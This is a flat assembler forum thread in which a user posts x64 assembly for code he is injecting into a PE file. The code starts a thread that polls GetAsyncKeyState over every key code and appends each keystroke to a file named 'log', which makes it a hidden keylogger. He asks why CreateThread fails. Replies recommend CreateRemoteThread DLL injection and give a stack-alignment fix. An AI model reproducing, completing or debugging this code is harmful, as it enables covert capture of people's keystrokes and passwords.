flat assembler
Message board for the users of flat assembler.

Index > Windows > Error in CreateThread at windows 64-bit

Author
Thread Post new topic Reply to topic
Apolo



Joined: 18 Mar 2017
Posts: 23
Apolo 18 Mar 2017, 18:08
I am trying to inject this code in a PE file to run my program with CreateThread
but CreateThread fails with 3E6h error. Where is my eerror in my source code below:
Code:
procedure:
    sub rsp, 28h            
    and rsp, 0fffffffffffffff0h     
    lea rdx,[loadlibrary7]
    lea rcx,[kernel32dll]
    call MyGetProcAddress                
 
    lea rcx, [user32dll]
    call rax                
 

    lea rdx, [createthread7]
    lea rcx, [kernel32dll]
    call MyGetProcAddress         
   lea rbx,[pThread]                                                                                                    ;     

   lea rbx,[ThreadId]
   mov qword[rsp+20h], rbx
   lea r9,[Par]
   lea r8,[KL]
   xor rdx,rdx
   lea rcx,[SECURITY_ATTRIBUTES_]
   call rax


    add rsp, 28h            
    db 0                    ;JMP PARA OEP
    db 0
    db 0
    db 0
    db 0
    db 0
    db 0
    db 0
    db 0


proc KL
REPS:
    lea rdx,[loadlibrary7]
    lea rcx,[kernel32dll]
    call MyGetProcAddress                
 
    lea rcx, [user32dll]
    call rax                
 
    lea rdx, [getasync]
    lea rcx, [user32dll]
    call MyGetProcAddress         
    MOV [GETKEYS],RAX

Label001:
mov [VIRTUAL_KEY_CODE],8
L0:
cmp [VIRTUAL_KEY_CODE],255
ja La1
mov rcx,[VIRTUAL_KEY_CODE]
MOV RAX,[GETKEYS]
call rax
cmp eax,-32767
MOV RAX,[GETKEYS]
jz Label1
inc [VIRTUAL_KEY_CODE]
jmp L0
La1:
mov [VIRTUAL_KEY_CODE],8
jmp Label001
Label1:

    lea rdx,[loadlibrary7]
    lea rcx,[kernel32dll]
    call MyGetProcAddress         


    lea rcx, [msvcrtdll]
    call rax                


    lea rdx, [fopen7]
    lea rcx,[msvcrtdll]
    call MyGetProcAddress                     
 
    lea r8, [filemode]
    lea rdx, [file_name]
    lea rcx,[fp]
    call rax                ;TO LOG KEYSTROKES

    lea rdx, [fwrite7]
    lea rcx,[msvcrtdll]
    call MyGetProcAddress         


    mov r9,[fp]
    mov r8,1
    mov rdx,1
    lea rcx, [VIRTUAL_KEY_CODE]
    call rax                ;TO LOG KEYSTROKES



    lea rdx, [fclose7]
    lea rcx,[msvcrtdll]
    call MyGetProcAddress         

    mov rcx,[fp]
    call rax

    jmp REPS
endp

proc MyGetProcAddress
...
ret
endp
kernel32dll            db  'KERNEL32.DLL', 0
loadlibrary7            db  'loadlibraryA', 0
user32dll              db  'USER32.DLL', 0
createthread7       db  'CreateThread', 0
msvcrtdll              db  'MSVCRT.DLL', 0
getasync                db  'GetAsyncKeyState', 0
fopen7              db  'fopen_s', 0
fwrite7             db  'fwrite',0
fclose7             db  'fclose',0
exitproc7           db  'ExitProcess', 0
filemode                db   'a',0
file_name               db   'log',0
pThread                 dq   0
struct SECURITY_ATTRIBUTES
A dd 0
B dq 0
C dd 0
ends
SECURITY_ATTRIBUTES_ SECURITY_ATTRIBUTES
GEYKEYS                 dq   0
VIRTUAL_KEY_CODE        dq   0
fp                      dq   0
Par                     dq   0
...
    
Post 18 Mar 2017, 18:08
View user's profile Send private message Reply with quote
bitRAKE



Joined: 21 Jul 2003
Posts: 4016
Location: vpcmpistri
bitRAKE 18 Mar 2017, 22:15
Why use SECURITY_ATTRIBUTES? Try NULL to use the default. Why not use CreateRemoteThread instead of injecting a bunch of code into the PE? I can't reproduce the error, and nothing stands out in the snippet posted. I'd be happy to test something more complete. Look at this method:

http://resources.infosecinstitute.com/using-createremotethread-for-dll-injection-on-windows/#gref

_________________
¯\(°_o)/¯ “languages are not safe - uses can be” Bjarne Stroustrup
Post 18 Mar 2017, 22:15
View user's profile Send private message Visit poster's website Reply with quote
EasyCode



Joined: 26 Jul 2015
Posts: 157
EasyCode 22 Mar 2017, 18:15
The CreateThread function needs 6 parameters, all of them QWORD in 64-bit Windows (a QWORD = 8 bytes), that is, 6x8 = 48 bytes. So try to decrement 48 bytes to rsp:

sub rsp, 48
...
...
add rsp, 48

And check that rsp is 16 byte-aligned before calling CreateThread,
Post 22 Mar 2017, 18:15
View user's profile Send private message Reply with quote
system error



Joined: 01 Sep 2013
Posts: 670
system error 23 Mar 2017, 03:25
With this kind of code, I am not convinced that this code would inject anything. MS security programmers are not that lame to let some attempt for buffer overrun or some random zeros to be left unattended in the code area. Even if this code compiles, there's a chance that Windows will inject its own CC instead. That irony of code injection.
Post 23 Mar 2017, 03:25
View user's profile Send private message Reply with quote
Display posts from previous:
Post new topic Reply to topic

Jump to:  


< Last Thread | Next Thread >
Forum Rules:
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Copyright © 1999-2024, Tomasz Grysztar. Also on GitHub, YouTube.

Website powered by rwasa.